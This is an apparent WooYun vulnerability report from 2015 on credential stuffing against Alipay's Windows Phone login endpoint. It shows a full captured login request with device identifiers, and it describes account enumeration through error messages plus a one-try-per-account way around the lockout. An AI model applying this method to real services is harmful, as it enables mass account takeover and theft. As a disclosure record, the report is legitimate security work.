当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-093613

漏洞标题:阿里巴巴某登录接口设计不当撞裤没商量

相关厂商:阿里巴巴

漏洞作者: MeirLin

提交时间:2015-01-24 17:23

修复时间:2015-03-10 17:24

公开时间:2015-03-10 17:24

漏洞类型:设计缺陷/逻辑错误

危害等级:中

自评Rank:5

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-01-24: 细节已通知厂商并且等待厂商处理中
2015-01-26: 厂商已经确认,细节仅向厂商公开
2015-02-05: 细节向核心白帽子及相关领域专家公开
2015-02-15: 细节向普通白帽子公开
2015-02-25: 细节向实习白帽子公开
2015-03-10: 细节向公众公开

简要描述:

针对拥有大量用户资源的厂商这种撞裤越有危害。
撞裤是一场需要用户参与的持久战,这种漏洞还是公开了比较好,让用户安全意识的重要性。
所以就没向ASRC提交 :-)

详细说明:

问题出在WindowsPhone移动端的支付宝钱包,登录没有限制(如验证码之类的)接着我们抓他的登录包

2.png


我们可以看到登录帐号是明文显示在包中的,而包我们可以随意更改,也就是说我们可以随意更改尝试登录的帐号,不过这里可以看到密码部分是加密过的,想要知道算法恐怕得去逆向程序了,但是我们目的是撞裤,可以保持密码部分不变来批量撞帐号,使用弱密码依然用猪猪侠发的弱密码TOP100中的top6
首先构造包

POST https://mobilegw.alipay.com/mgw.htm HTTP/1.1
Accept: */*
Content-Length: 1104
Accept-Encoding: identity
did: dCLcmB/mO88BAWz2oVqhLlsC
clientId: 8d19c072a4
productId: WINPHONE_2ND
Cookie: zone=GZ00B;Domain=.alipay.com;Path=/,path=/
Content-Type: application/x-www-form-urlencoded;charset=UTF-8
User-Agent: NativeHost
Host: mobilegw.alipay.com
Connection: Keep-Alive
Cache-Control: no-cache


operationType=alipay.user.login&requestData=[{"loginId":"1588888888","loginType":"alipay","loginWthPwd":"withpwd","loginPassword":"p%2FzZD0Ppk%2FzQPItvn7snMMV%2FmVSlnhcaphtX6XRspjnuNC8gYZ6eEEJLHIfS8XMo%2BwUjFUTnqgKkzyJp%2FLYU66VtvAwVcsLeW7XomyAg7VKq%2FLevUHFlaUx3GlS0o%2FDfZ%2FOOTVjrKkfRIOSoefAo6JLUqVQAnl8uYHQ%2FmgMz67g%3D","loginCheckCode":"","tbCheckCodeId":null,"tbCheckCode":null,"productId":"WINPHONE_2ND","productVersion":"8.2.1.0806","osVersion":"3051.50009.1424.0002","userAgent":"0.5.0.1","channels":"wpstore","clientDigest":null,"secTS":"2020878325","deviceToken":null,"screenWidth":"480","screenHigh":"800","clientId":"464240418101466|314875527246815","walletTid":"61059d609a482248c67be9cb0bccb90c0ec9da25a1be557aaf2c4d5f0c1b9bf3","walletClientKey":"464240418101466|314875527246815","mspTid":"61059d609a482248c67be9cb0bccb90c0ec9da25a1be557aaf2c4d5f0c1b9bf3","mspImsi":"464240418101466","mspImei":"314875527246815","mspClientKey":"8d19c072a4","sourceId":null,"mac":"","cellId":null,"location":null,"vimsi":"464240418101466","vimei":"314875527246815","externParams":null,"operatorType":null}]


哎呀,把我设备的各种信息都泄漏了,不过无所谓.. 在这个互联网谁还会有隐私呢 ?
这里加密的密码部分明文应该是“woaini1314”那我们针对这个弱密码就可以批量撞帐号了,所以用户数量越大的厂商这类的撞裤命中率越高,弱密码可没办法防止,所以说撞裤漏洞是一场需要用户参与的持久战。
但是呢,大量的帐号哪里弄? 这很简单呀
在登录的时候,在帐号处填写的手机号如果没有绑定支付宝的话就会显示“该账户不存在”,如果一个帐号存在的话我们尝试登录就会显示“密码输入错误”然后用字典工具生成11位的数字组合,前3位是号段,所以只要生成后8位就可以了

3.png

4.png


那我们把上个测试迅雷撞裤的脚本稍微修改一下就能拿来用了

5.png

如果有跑出来成功的就会保存在good.txt,为了节省时间我并没有真的去测试大量帐号,只是测试了我自己的帐号是否能成功,我把自己的支付宝密码改为了woaini1314,然后添加到usernames.txt,

6.png


看看会不会被撞到,结果是成功撞到的。

7.png


所以呢,针对这个弱密码还是可以撞到一部分用户的 。。

漏洞证明:

5.png


7.png


其实阿里也是有措施防止撞裤的,每个帐号密码尝试次数为5次,如果错误五次就会锁定3小时
但是我这里撞裤是针对密码来撞的,如果密码不正确就直接过了,所以只会尝试一遍..也就巧妙绕过了这个防护措施

修复方案:

移动端和Web端同样重要

版权声明:转载请注明来源 MeirLin@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:2

确认时间:2015-01-26 19:53

厂商回复:

属于已知漏洞,感谢您对阿里巴巴安全的关注!

最新状态:

暂无